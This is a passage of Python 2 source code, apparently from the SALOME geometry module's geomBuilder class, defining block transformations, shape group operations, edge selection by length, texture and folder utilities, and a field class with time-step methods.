def MakeMultiTransformation1D(self, Block, DirFace1, DirFace2, NbTimes, theName=None):
"""
Multi-transformate block and glue the result.
Transformation is defined so, as to superpose direction faces.
Parameters:
Block Hexahedral solid to be multi-transformed.
DirFace1 ID of First direction face.
DirFace2 ID of Second direction face.
NbTimes Quantity of transformations to be done.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
Unique ID of sub-shape can be obtained, using method GetSubShapeID().
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_Spanner.py
DirFace1,DirFace2,NbTimes,Parameters = ParseParameters(DirFace1,DirFace2,NbTimes)
anObj = self.BlocksOp.MakeMultiTransformation1D(Block, DirFace1, DirFace2, NbTimes)
RaiseIfFailed("MakeMultiTransformation1D", self.BlocksOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "transformed")
return anObj
## Multi-transformate block and glue the result.
# @param Block Hexahedral solid to be multi-transformed.
# @param DirFace1U,DirFace2U IDs of Direction faces for the first transformation.
# @param DirFace1V,DirFace2V IDs of Direction faces for the second transformation.
# @param NbTimesU,NbTimesV Quantity of transformations to be done.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_multi_transformation "Example"
@ManageTransactions("BlocksOp")
def MakeMultiTransformation2D(self, Block, DirFace1U, DirFace2U, NbTimesU,
DirFace1V, DirFace2V, NbTimesV, theName=None):
"""
Multi-transformate block and glue the result.
Parameters:
Block Hexahedral solid to be multi-transformed.
DirFace1U,DirFace2U IDs of Direction faces for the first transformation.
DirFace1V,DirFace2V IDs of Direction faces for the second transformation.
NbTimesU,NbTimesV Quantity of transformations to be done.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_Spanner.py
DirFace1U,DirFace2U,NbTimesU,DirFace1V,DirFace2V,NbTimesV,Parameters = ParseParameters(
DirFace1U,DirFace2U,NbTimesU,DirFace1V,DirFace2V,NbTimesV)
anObj = self.BlocksOp.MakeMultiTransformation2D(Block, DirFace1U, DirFace2U, NbTimesU,
DirFace1V, DirFace2V, NbTimesV)
RaiseIfFailed("MakeMultiTransformation2D", self.BlocksOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "transformed")
return anObj
## Build all possible propagation groups.
# Propagation group is a set of all edges, opposite to one (main)
# edge of this group directly or through other opposite edges.
# Notion of Opposite Edge make sence only on quadrangle face.
# @param theShape Shape to build propagation groups on.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of GEOM.GEOM_Object, each of them is a propagation group.
#
# @ref swig_Propagate "Example"
@ManageTransactions("BlocksOp")
def Propagate(self, theShape, theName=None):
"""
Build all possible propagation groups.
Propagation group is a set of all edges, opposite to one (main)
edge of this group directly or through other opposite edges.
Notion of Opposite Edge make sence only on quadrangle face.
Parameters:
theShape Shape to build propagation groups on.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of GEOM.GEOM_Object, each of them is a propagation group.
"""
# Example: see GEOM_TestOthers.py
listChains = self.BlocksOp.Propagate(theShape)
RaiseIfFailed("Propagate", self.BlocksOp)
self._autoPublish(listChains, theName, "propagate")
return listChains
# end of l3_blocks_op
## @}
## @addtogroup l3_groups
## @{
## Creates a new group which will store sub-shapes of theMainShape
# @param theMainShape is a GEOM object on which the group is selected
# @param theShapeType defines a shape type of the group (see GEOM::shape_type)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return a newly created GEOM group (GEOM.GEOM_Object)
#
# @ref tui_working_with_groups_page "Example 1"
# \n @ref swig_CreateGroup "Example 2"
@ManageTransactions("GroupOp")
def CreateGroup(self, theMainShape, theShapeType, theName=None):
"""
Creates a new group which will store sub-shapes of theMainShape
Parameters:
theMainShape is a GEOM object on which the group is selected
theShapeType defines a shape type of the group:"COMPOUND", "COMPSOLID",
"SOLID", "SHELL", "FACE", "WIRE", "EDGE", "VERTEX", "SHAPE".
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
a newly created GEOM group
Example of usage:
group = geompy.CreateGroup(Box, geompy.ShapeType["FACE"])
"""
# Example: see GEOM_TestOthers.py
anObj = self.GroupOp.CreateGroup(theMainShape, theShapeType)
RaiseIfFailed("CreateGroup", self.GroupOp)
self._autoPublish(anObj, theName, "group")
return anObj
## Adds a sub-object with ID theSubShapeId to the group
# @param theGroup is a GEOM group to which the new sub-shape is added
# @param theSubShapeID is a sub-shape ID in the main object.
# \note Use method GetSubShapeID() to get an unique ID of the sub-shape
#
# @ref tui_working_with_groups_page "Example"
@ManageTransactions("GroupOp")
def AddObject(self,theGroup, theSubShapeID):
"""
Adds a sub-object with ID theSubShapeId to the group
Parameters:
theGroup is a GEOM group to which the new sub-shape is added
theSubShapeID is a sub-shape ID in the main object.
Note:
Use method GetSubShapeID() to get an unique ID of the sub-shape
"""
# Example: see GEOM_TestOthers.py
self.GroupOp.AddObject(theGroup, theSubShapeID)
if self.GroupOp.GetErrorCode() != "PAL_ELEMENT_ALREADY_PRESENT":
RaiseIfFailed("AddObject", self.GroupOp)
pass
pass
## Removes a sub-object with ID \a theSubShapeId from the group
# @param theGroup is a GEOM group from which the new sub-shape is removed
# @param theSubShapeID is a sub-shape ID in the main object.
# \note Use method GetSubShapeID() to get an unique ID of the sub-shape
#
# @ref tui_working_with_groups_page "Example"
@ManageTransactions("GroupOp")
def RemoveObject(self,theGroup, theSubShapeID):
"""
Removes a sub-object with ID theSubShapeId from the group
Parameters:
theGroup is a GEOM group from which the new sub-shape is removed
theSubShapeID is a sub-shape ID in the main object.
Note:
Use method GetSubShapeID() to get an unique ID of the sub-shape
"""
# Example: see GEOM_TestOthers.py
self.GroupOp.RemoveObject(theGroup, theSubShapeID)
RaiseIfFailed("RemoveObject", self.GroupOp)
pass
## Adds to the group all the given shapes. No errors, if some shapes are alredy included.
# @param theGroup is a GEOM group to which the new sub-shapes are added.
# @param theSubShapes is a list of sub-shapes to be added.
#
# @ref tui_working_with_groups_page "Example"
@ManageTransactions("GroupOp")
def UnionList (self,theGroup, theSubShapes):
"""
Adds to the group all the given shapes. No errors, if some shapes are alredy included.
Parameters:
theGroup is a GEOM group to which the new sub-shapes are added.
theSubShapes is a list of sub-shapes to be added.
"""
# Example: see GEOM_TestOthers.py
self.GroupOp.UnionList(theGroup, theSubShapes)
RaiseIfFailed("UnionList", self.GroupOp)
pass
## Adds to the group all the given shapes. No errors, if some shapes are alredy included.
# @param theGroup is a GEOM group to which the new sub-shapes are added.
# @param theSubShapes is a list of indices of sub-shapes to be added.
#
# @ref swig_UnionIDs "Example"
@ManageTransactions("GroupOp")
def UnionIDs(self,theGroup, theSubShapes):
"""
Adds to the group all the given shapes. No errors, if some shapes are alredy included.
Parameters:
theGroup is a GEOM group to which the new sub-shapes are added.
theSubShapes is a list of indices of sub-shapes to be added.
"""
# Example: see GEOM_TestOthers.py
self.GroupOp.UnionIDs(theGroup, theSubShapes)
RaiseIfFailed("UnionIDs", self.GroupOp)
pass
## Removes from the group all the given shapes. No errors, if some shapes are not included.
# @param theGroup is a GEOM group from which the sub-shapes are removed.
# @param theSubShapes is a list of sub-shapes to be removed.
#
# @ref tui_working_with_groups_page "Example"
@ManageTransactions("GroupOp")
def DifferenceList (self,theGroup, theSubShapes):
"""
Removes from the group all the given shapes. No errors, if some shapes are not included.
Parameters:
theGroup is a GEOM group from which the sub-shapes are removed.
theSubShapes is a list of sub-shapes to be removed.
"""
# Example: see GEOM_TestOthers.py
self.GroupOp.DifferenceList(theGroup, theSubShapes)
RaiseIfFailed("DifferenceList", self.GroupOp)
pass
## Removes from the group all the given shapes. No errors, if some shapes are not included.
# @param theGroup is a GEOM group from which the sub-shapes are removed.
# @param theSubShapes is a list of indices of sub-shapes to be removed.
#
# @ref swig_DifferenceIDs "Example"
@ManageTransactions("GroupOp")
def DifferenceIDs(self,theGroup, theSubShapes):
"""
Removes from the group all the given shapes. No errors, if some shapes are not included.
Parameters:
theGroup is a GEOM group from which the sub-shapes are removed.
theSubShapes is a list of indices of sub-shapes to be removed.
"""
# Example: see GEOM_TestOthers.py
self.GroupOp.DifferenceIDs(theGroup, theSubShapes)
RaiseIfFailed("DifferenceIDs", self.GroupOp)
pass
## Union of two groups.
# New group is created. It will contain all entities
# which are present in groups theGroup1 and theGroup2.
# @param theGroup1, theGroup2 are the initial GEOM groups
# to create the united group from.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return a newly created GEOM group.
#
# @ref tui_union_groups_anchor "Example"
@ManageTransactions("GroupOp")
def UnionGroups (self, theGroup1, theGroup2, theName=None):
"""
Union of two groups.
New group is created. It will contain all entities
which are present in groups theGroup1 and theGroup2.
Parameters:
theGroup1, theGroup2 are the initial GEOM groups
to create the united group from.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
a newly created GEOM group.
"""
# Example: see GEOM_TestOthers.py
aGroup = self.GroupOp.UnionGroups(theGroup1, theGroup2)
RaiseIfFailed("UnionGroups", self.GroupOp)
self._autoPublish(aGroup, theName, "group")
return aGroup
## Intersection of two groups.
# New group is created. It will contain only those entities
# which are present in both groups theGroup1 and theGroup2.
# @param theGroup1, theGroup2 are the initial GEOM groups to get common part of.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return a newly created GEOM group.
#
# @ref tui_intersect_groups_anchor "Example"
@ManageTransactions("GroupOp")
def IntersectGroups (self, theGroup1, theGroup2, theName=None):
"""
Intersection of two groups.
New group is created. It will contain only those entities
which are present in both groups theGroup1 and theGroup2.
Parameters:
theGroup1, theGroup2 are the initial GEOM groups to get common part of.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
a newly created GEOM group.
"""
# Example: see GEOM_TestOthers.py
aGroup = self.GroupOp.IntersectGroups(theGroup1, theGroup2)
RaiseIfFailed("IntersectGroups", self.GroupOp)
self._autoPublish(aGroup, theName, "group")
return aGroup
## Cut of two groups.
# New group is created. It will contain entities which are
# present in group theGroup1 but are not present in group theGroup2.
# @param theGroup1 is a GEOM group to include elements of.
# @param theGroup2 is a GEOM group to exclude elements of.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return a newly created GEOM group.
#
# @ref tui_cut_groups_anchor "Example"
@ManageTransactions("GroupOp")
def CutGroups (self, theGroup1, theGroup2, theName=None):
"""
Cut of two groups.
New group is created. It will contain entities which are
present in group theGroup1 but are not present in group theGroup2.
Parameters:
theGroup1 is a GEOM group to include elements of.
theGroup2 is a GEOM group to exclude elements of.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
a newly created GEOM group.
"""
# Example: see GEOM_TestOthers.py
aGroup = self.GroupOp.CutGroups(theGroup1, theGroup2)
RaiseIfFailed("CutGroups", self.GroupOp)
self._autoPublish(aGroup, theName, "group")
return aGroup
## Union of list of groups.
# New group is created. It will contain all entities that are
# present in groups listed in theGList.
# @param theGList is a list of GEOM groups to create the united group from.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return a newly created GEOM group.
#
# @ref tui_union_groups_anchor "Example"
@ManageTransactions("GroupOp")
def UnionListOfGroups (self, theGList, theName=None):
"""
Union of list of groups.
New group is created. It will contain all entities that are
present in groups listed in theGList.
Parameters:
theGList is a list of GEOM groups to create the united group from.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
a newly created GEOM group.
"""
# Example: see GEOM_TestOthers.py
aGroup = self.GroupOp.UnionListOfGroups(theGList)
RaiseIfFailed("UnionListOfGroups", self.GroupOp)
self._autoPublish(aGroup, theName, "group")
return aGroup
## Cut of lists of groups.
# New group is created. It will contain only entities
# which are present in groups listed in theGList.
# @param theGList is a list of GEOM groups to include elements of.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return a newly created GEOM group.
#
# @ref tui_intersect_groups_anchor "Example"
@ManageTransactions("GroupOp")
def IntersectListOfGroups (self, theGList, theName=None):
"""
Cut of lists of groups.
New group is created. It will contain only entities
which are present in groups listed in theGList.
Parameters:
theGList is a list of GEOM groups to include elements of.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
a newly created GEOM group.
"""
# Example: see GEOM_TestOthers.py
aGroup = self.GroupOp.IntersectListOfGroups(theGList)
RaiseIfFailed("IntersectListOfGroups", self.GroupOp)
self._autoPublish(aGroup, theName, "group")
return aGroup
## Cut of lists of groups.
# New group is created. It will contain only entities
# which are present in groups listed in theGList1 but
# are not present in groups from theGList2.
# @param theGList1 is a list of GEOM groups to include elements of.
# @param theGList2 is a list of GEOM groups to exclude elements of.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return a newly created GEOM group.
#
# @ref tui_cut_groups_anchor "Example"
@ManageTransactions("GroupOp")
def CutListOfGroups (self, theGList1, theGList2, theName=None):
"""
Cut of lists of groups.
New group is created. It will contain only entities
which are present in groups listed in theGList1 but
are not present in groups from theGList2.
Parameters:
theGList1 is a list of GEOM groups to include elements of.
theGList2 is a list of GEOM groups to exclude elements of.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
a newly created GEOM group.
"""
# Example: see GEOM_TestOthers.py
aGroup = self.GroupOp.CutListOfGroups(theGList1, theGList2)
RaiseIfFailed("CutListOfGroups", self.GroupOp)
self._autoPublish(aGroup, theName, "group")
return aGroup
## Returns a list of sub-objects ID stored in the group
# @param theGroup is a GEOM group for which a list of IDs is requested
#
# @ref swig_GetObjectIDs "Example"
@ManageTransactions("GroupOp")
def GetObjectIDs(self,theGroup):
"""
Returns a list of sub-objects ID stored in the group
Parameters:
theGroup is a GEOM group for which a list of IDs is requested
"""
# Example: see GEOM_TestOthers.py
ListIDs = self.GroupOp.GetObjects(theGroup)
RaiseIfFailed("GetObjects", self.GroupOp)
return ListIDs
## Returns a type of sub-objects stored in the group
# @param theGroup is a GEOM group which type is returned.
#
# @ref swig_GetType "Example"
@ManageTransactions("GroupOp")
def GetType(self,theGroup):
"""
Returns a type of sub-objects stored in the group
Parameters:
theGroup is a GEOM group which type is returned.
"""
# Example: see GEOM_TestOthers.py
aType = self.GroupOp.GetType(theGroup)
RaiseIfFailed("GetType", self.GroupOp)
return aType
## Convert a type of geom object from id to string value
# @param theId is a GEOM obect type id.
# @return type of geom object (POINT, VECTOR, PLANE, LINE, TORUS, ... )
# @ref swig_GetType "Example"
def ShapeIdToType(self, theId):
"""
Convert a type of geom object from id to string value
Parameters:
theId is a GEOM obect type id.
Returns:
type of geom object (POINT, VECTOR, PLANE, LINE, TORUS, ... )
"""
if theId == 0:
return "COPY"
if theId == 1:
return "IMPORT"
if theId == 2:
return "POINT"
if theId == 3:
return "VECTOR"
if theId == 4:
return "PLANE"
if theId == 5:
return "LINE"
if theId == 6:
return "TORUS"
if theId == 7:
return "BOX"
if theId == 8:
return "CYLINDER"
if theId == 9:
return "CONE"
if theId == 10:
return "SPHERE"
if theId == 11:
return "PRISM"
if theId == 12:
return "REVOLUTION"
if theId == 13:
return "BOOLEAN"
if theId == 14:
return "PARTITION"
if theId == 15:
return "POLYLINE"
if theId == 16:
return "CIRCLE"
if theId == 17:
return "SPLINE"
if theId == 18:
return "ELLIPSE"
if theId == 19:
return "CIRC_ARC"
if theId == 20:
return "FILLET"
if theId == 21:
return "CHAMFER"
if theId == 22:
return "EDGE"
if theId == 23:
return "WIRE"
if theId == 24:
return "FACE"
if theId == 25:
return "SHELL"
if theId == 26:
return "SOLID"
if theId == 27:
return "COMPOUND"
if theId == 28:
return "SUBSHAPE"
if theId == 29:
return "PIPE"
if theId == 30:
return "ARCHIMEDE"
if theId == 31:
return "FILLING"
if theId == 32:
return "EXPLODE"
if theId == 33:
return "GLUED"
if theId == 34:
return "SKETCHER"
if theId == 35:
return "CDG"
if theId == 36:
return "FREE_BOUNDS"
if theId == 37:
return "GROUP"
if theId == 38:
return "BLOCK"
if theId == 39:
return "MARKER"
if theId == 40:
return "THRUSECTIONS"
if theId == 41:
return "COMPOUNDFILTER"
if theId == 42:
return "SHAPES_ON_SHAPE"
if theId == 43:
return "ELLIPSE_ARC"
if theId == 44:
return "3DSKETCHER"
if theId == 45:
return "FILLET_2D"
if theId == 46:
return "FILLET_1D"
if theId == 201:
return "PIPETSHAPE"
return "Shape Id not exist."
## Returns a main shape associated with the group
# @param theGroup is a GEOM group for which a main shape object is requested
# @return a GEOM object which is a main shape for theGroup
#
# @ref swig_GetMainShape "Example"
@ManageTransactions("GroupOp")
def GetMainShape(self,theGroup):
"""
Returns a main shape associated with the group
Parameters:
theGroup is a GEOM group for which a main shape object is requested
Returns:
a GEOM object which is a main shape for theGroup
Example of usage: BoxCopy = geompy.GetMainShape(CreateGroup)
"""
# Example: see GEOM_TestOthers.py
anObj = self.GroupOp.GetMainShape(theGroup)
RaiseIfFailed("GetMainShape", self.GroupOp)
return anObj
## Create group of edges of theShape, whose length is in range [min_length, max_length].
# If include_min/max == 0, edges with length == min/max_length will not be included in result.
# @param theShape given shape (see GEOM.GEOM_Object)
# @param min_length minimum length of edges of theShape
# @param max_length maximum length of edges of theShape
# @param include_max indicating if edges with length == max_length should be included in result, 1-yes, 0-no (default=1)
# @param include_min indicating if edges with length == min_length should be included in result, 1-yes, 0-no (default=1)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return a newly created GEOM group of edges
#
# @@ref swig_todo "Example"
def GetEdgesByLength (self, theShape, min_length, max_length, include_min = 1, include_max = 1, theName=None):
"""
Create group of edges of theShape, whose length is in range [min_length, max_length].
If include_min/max == 0, edges with length == min/max_length will not be included in result.
Parameters:
theShape given shape
min_length minimum length of edges of theShape
max_length maximum length of edges of theShape
include_max indicating if edges with length == max_length should be included in result, 1-yes, 0-no (default=1)
include_min indicating if edges with length == min_length should be included in result, 1-yes, 0-no (default=1)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
a newly created GEOM group of edges.
"""
edges = self.SubShapeAll(theShape, self.ShapeType["EDGE"])
edges_in_range = []
for edge in edges:
Props = self.BasicProperties(edge)
if min_length <= Props[0] and Props[0] <= max_length:
if (not include_min) and (min_length == Props[0]):
skip = 1
else:
if (not include_max) and (Props[0] == max_length):
skip = 1
else:
edges_in_range.append(edge)
if len(edges_in_range) <= 0:
print "No edges found by given criteria"
return None
# note: auto-publishing is done in self.CreateGroup()
group_edges = self.CreateGroup(theShape, self.ShapeType["EDGE"], theName)
self.UnionList(group_edges, edges_in_range)
return group_edges
## Create group of edges of selected shape, whose length is in range [min_length, max_length].
# If include_min/max == 0, edges with length == min/max_length will not be included in result.
# @param min_length minimum length of edges of selected shape
# @param max_length maximum length of edges of selected shape
# @param include_max indicating if edges with length == max_length should be included in result, 1-yes, 0-no (default=1)
# @param include_min indicating if edges with length == min_length should be included in result, 1-yes, 0-no (default=1)
# @return a newly created GEOM group of edges
# @ref swig_todo "Example"
def SelectEdges (self, min_length, max_length, include_min = 1, include_max = 1):
"""
Create group of edges of selected shape, whose length is in range [min_length, max_length].
If include_min/max == 0, edges with length == min/max_length will not be included in result.
Parameters:
min_length minimum length of edges of selected shape
max_length maximum length of edges of selected shape
include_max indicating if edges with length == max_length should be included in result, 1-yes, 0-no (default=1)
include_min indicating if edges with length == min_length should be included in result, 1-yes, 0-no (default=1)
Returns:
a newly created GEOM group of edges.
"""
nb_selected = sg.SelectedCount()
if nb_selected < 1:
print "Select a shape before calling this function, please."
return 0
if nb_selected > 1:
print "Only one shape must be selected"
return 0
id_shape = sg.getSelected(0)
shape = IDToObject( id_shape )
group_edges = self.GetEdgesByLength(shape, min_length, max_length, include_min, include_max)
left_str = " < "
right_str = " < "
if include_min: left_str = " <= "
if include_max: right_str = " <= "
self.addToStudyInFather(shape, group_edges, "Group of edges with " + `min_length`
+ left_str + "length" + right_str + `max_length`)
sg.updateObjBrowser(1)
return group_edges
# end of l3_groups
## @}
#@@ insert new functions before this line @@ do not remove this line @@#
## Create a copy of the given object
#
# @param theOriginal geometry object for copy
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM_Object, containing the copied shape.
#
# @ingroup l1_geomBuilder_auxiliary
# @ref swig_MakeCopy "Example"
@ManageTransactions("InsertOp")
def MakeCopy(self, theOriginal, theName=None):
"""
Create a copy of the given object
Parameters:
theOriginal geometry object for copy
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM_Object, containing the copied shape.
Example of usage: Copy = geompy.MakeCopy(Box)
"""
# Example: see GEOM_TestAll.py
anObj = self.InsertOp.MakeCopy(theOriginal)
RaiseIfFailed("MakeCopy", self.InsertOp)
self._autoPublish(anObj, theName, "copy")
return anObj
## Add Path to load python scripts from
# @param Path a path to load python scripts from
# @ingroup l1_geomBuilder_auxiliary
def addPath(self,Path):
"""
Add Path to load python scripts from
Parameters:
Path a path to load python scripts from
"""
if (sys.path.count(Path) < 1):
sys.path.append(Path)
pass
pass
## Load marker texture from the file
# @param Path a path to the texture file
# @return unique texture identifier
# @ingroup l1_geomBuilder_auxiliary
@ManageTransactions("InsertOp")
def LoadTexture(self, Path):
"""
Load marker texture from the file
Parameters:
Path a path to the texture file
Returns:
unique texture identifier
"""
# Example: see GEOM_TestAll.py
ID = self.InsertOp.LoadTexture(Path)
RaiseIfFailed("LoadTexture", self.InsertOp)
return ID
## Get internal name of the object based on its study entry
# @note This method does not provide an unique identifier of the geometry object.
# @note This is internal function of GEOM component, though it can be used outside it for
# appropriate reason (e.g. for identification of geometry object).
# @param obj geometry object
# @return unique object identifier
# @ingroup l1_geomBuilder_auxiliary
def getObjectID(self, obj):
"""
Get internal name of the object based on its study entry.
Note: this method does not provide an unique identifier of the geometry object.
It is an internal function of GEOM component, though it can be used outside GEOM for
appropriate reason (e.g. for identification of geometry object).
Parameters:
obj geometry object
Returns:
unique object identifier
"""
ID = ""
entry = salome.ObjectToID(obj)
if entry is not None:
lst = entry.split(":")
if len(lst) > 0:
ID = lst[-1] # -1 means last item in the list
return "GEOM_" + ID
return ID
## Add marker texture. @a Width and @a Height parameters
# specify width and height of the texture in pixels.
# If @a RowData is @c True, @a Texture parameter should represent texture data
# packed into the byte array. If @a RowData is @c False (default), @a Texture
# parameter should be unpacked string, in which '1' symbols represent opaque
# pixels and '0' represent transparent pixels of the texture bitmap.
#
# @param Width texture width in pixels
# @param Height texture height in pixels
# @param Texture texture data
# @param RowData if @c True, @a Texture data are packed in the byte stream
# @return unique texture identifier
# @ingroup l1_geomBuilder_auxiliary
@ManageTransactions("InsertOp")
def AddTexture(self, Width, Height, Texture, RowData=False):
"""
Add marker texture. Width and Height parameters
specify width and height of the texture in pixels.
If RowData is True, Texture parameter should represent texture data
packed into the byte array. If RowData is False (default), Texture
parameter should be unpacked string, in which '1' symbols represent opaque
pixels and '0' represent transparent pixels of the texture bitmap.
Parameters:
Width texture width in pixels
Height texture height in pixels
Texture texture data
RowData if True, Texture data are packed in the byte stream
Returns:
return unique texture identifier
"""
if not RowData: Texture = PackData(Texture)
ID = self.InsertOp.AddTexture(Width, Height, Texture)
RaiseIfFailed("AddTexture", self.InsertOp)
return ID
## Creates a new folder object. It is a container for any GEOM objects.
# @param Name name of the container
# @param Father parent object. If None,
# folder under 'Geometry' root object will be created.
# @return a new created folder
# @ingroup l1_publish_data
def NewFolder(self, Name, Father=None):
"""
Create a new folder object. It is an auxiliary container for any GEOM objects.
Parameters:
Name name of the container
Father parent object. If None,
folder under 'Geometry' root object will be created.
Returns:
a new created folder
"""
if not Father: Father = self.father
return self.CreateFolder(Name, Father)
## Move object to the specified folder
# @param Object object to move
# @param Folder target folder
# @ingroup l1_publish_data
def PutToFolder(self, Object, Folder):
"""
Move object to the specified folder
Parameters:
Object object to move
Folder target folder
"""
self.MoveToFolder(Object, Folder)
pass
## Move list of objects to the specified folder
# @param ListOfSO list of objects to move
# @param Folder target folder
# @ingroup l1_publish_data
def PutListToFolder(self, ListOfSO, Folder):
"""
Move list of objects to the specified folder
Parameters:
ListOfSO list of objects to move
Folder target folder
"""
self.MoveListToFolder(ListOfSO, Folder)
pass
## @addtogroup l2_field
## @{
## Creates a field
# @param shape the shape the field lies on
# @param name the field name
# @param type type of field data: 0 - bool, 1 - int, 2 - double, 3 - string
# @param dimension dimension of the shape the field lies on
# 0 - VERTEX, 1 - EDGE, 2 - FACE, 3 - SOLID, -1 - whole shape
# @param componentNames names of components
# @return a created field
@ManageTransactions("FieldOp")
def CreateField(self, shape, name, type, dimension, componentNames):
"""
Creates a field
Parameters:
shape the shape the field lies on
name the field name
type type of field data
dimension dimension of the shape the field lies on
0 - VERTEX, 1 - EDGE, 2 - FACE, 3 - SOLID, -1 - whole shape
componentNames names of components
Returns:
a created field
"""
if isinstance( type, int ):
if type < 0 or type > 3:
raise RuntimeError, "CreateField : Error: data type must be within [0-3] range"
type = [GEOM.FDT_Bool,GEOM.FDT_Int,GEOM.FDT_Double,GEOM.FDT_String][type]
f = self.FieldOp.CreateField( shape, name, type, dimension, componentNames)
RaiseIfFailed("CreateField", self.FieldOp)
global geom
geom._autoPublish( f, "", name)
return f
## Removes a field from the GEOM component
# @param field the field to remove
def RemoveField(self, field):
"Removes a field from the GEOM component"
global geom
if isinstance( field, GEOM._objref_GEOM_Field ):
geom.RemoveObject( field )
elif isinstance( field, geomField ):
geom.RemoveObject( field.field )
else:
raise RuntimeError, "RemoveField() : the object is not a field"
return
## Returns number of fields on a shape
@ManageTransactions("FieldOp")
def CountFields(self, shape):
"Returns number of fields on a shape"
nb = self.FieldOp.CountFields( shape )
RaiseIfFailed("CountFields", self.FieldOp)
return nb
## Returns all fields on a shape
@ManageTransactions("FieldOp")
def GetFields(self, shape):
"Returns all fields on a shape"
ff = self.FieldOp.GetFields( shape )
RaiseIfFailed("GetFields", self.FieldOp)
return ff
## Returns a field on a shape by its name
@ManageTransactions("FieldOp")
def GetField(self, shape, name):
"Returns a field on a shape by its name"
f = self.FieldOp.GetField( shape, name )
RaiseIfFailed("GetField", self.FieldOp)
return f
# end of l2_field
## @}
import omniORB
# Register the new proxy for GEOM_Gen
omniORB.registerObjref(GEOM._objref_GEOM_Gen._NP_RepositoryId, geomBuilder)
## Field on Geometry
# @ingroup l2_field
class geomField( GEOM._objref_GEOM_Field ):
def __init__(self):
GEOM._objref_GEOM_Field.__init__(self)
self.field = GEOM._objref_GEOM_Field
return
## Returns the shape the field lies on
def getShape(self):
"Returns the shape the field lies on"
return self.field.GetShape(self)
## Returns the field name
def getName(self):
"Returns the field name"
return self.field.GetName(self)
## Returns type of field data as integer [0-3]
def getType(self):
"Returns type of field data"
return self.field.GetDataType(self)._v
## Returns type of field data:
# one of GEOM.FDT_Bool, GEOM.FDT_Int, GEOM.FDT_Double, GEOM.FDT_String
def getTypeEnum(self):
"Returns type of field data"
return self.field.GetDataType(self)
## Returns dimension of the shape the field lies on:
# 0 - VERTEX, 1 - EDGE, 2 - FACE, 3 - SOLID, -1 - whole shape
def getDimension(self):
"""Returns dimension of the shape the field lies on:
0 - VERTEX, 1 - EDGE, 2 - FACE, 3 - SOLID, -1 - whole shape"""
return self.field.GetDimension(self)
## Returns names of components
def getComponents(self):
"Returns names of components"
return self.field.GetComponents(self)
## Adds a time step to the field
# @param step the time step number further used as the step identifier
# @param stamp the time step time
# @param values the values of the time step
def addStep(self, step, stamp, values):
"Adds a time step to the field"
stp = self.field.AddStep( self, step, stamp )
if not stp:
raise RuntimeError, \
"Field.addStep() : Error: step %s already exists in this field"%step
global geom
geom._autoPublish( stp, "", "Step %s, %s"%(step,stamp))
self.setValues( step, values )
return stp
## Remove a time step from the field
def removeStep(self,step):
"Remove a time step from the field"
stepSO = None
try:
stepObj = self.field.GetStep( self, step )
if stepObj:
stepSO = geom.myStudy.FindObjectID( stepObj.GetStudyEntry() )
except:
#import traceback
#traceback.print_exc()
pass
self.field.RemoveStep( self, step )
if stepSO:
geom.myBuilder.RemoveObjectWithChildren( stepSO )
return
## Returns number of time steps in the field
def countSteps(self):
"Returns number of time steps in the field"
return self.field.CountSteps(self)
## Returns a list of time step IDs in the field
def getSteps(self):
"Returns a list of time step IDs in the field"
return self.field.GetSteps(self)
## Returns a time step by its ID
def getStep(self,step):
"Returns a time step by its ID"
stp = self.field.GetStep(self, step)
if not stp:
raise RuntimeError, "Step %s is missing from this field"%step
return stp
## Returns the time of the field step
def getStamp(self,step):
"Returns the time of the field step"
return self.getStep(step).GetStamp()
## Changes the time of the field step
def setStamp(self, step, stamp):
"Changes the time of the field step"
return self.getStep(step).SetStamp(stamp)
## Returns values of the field step
def getValues(self, step):
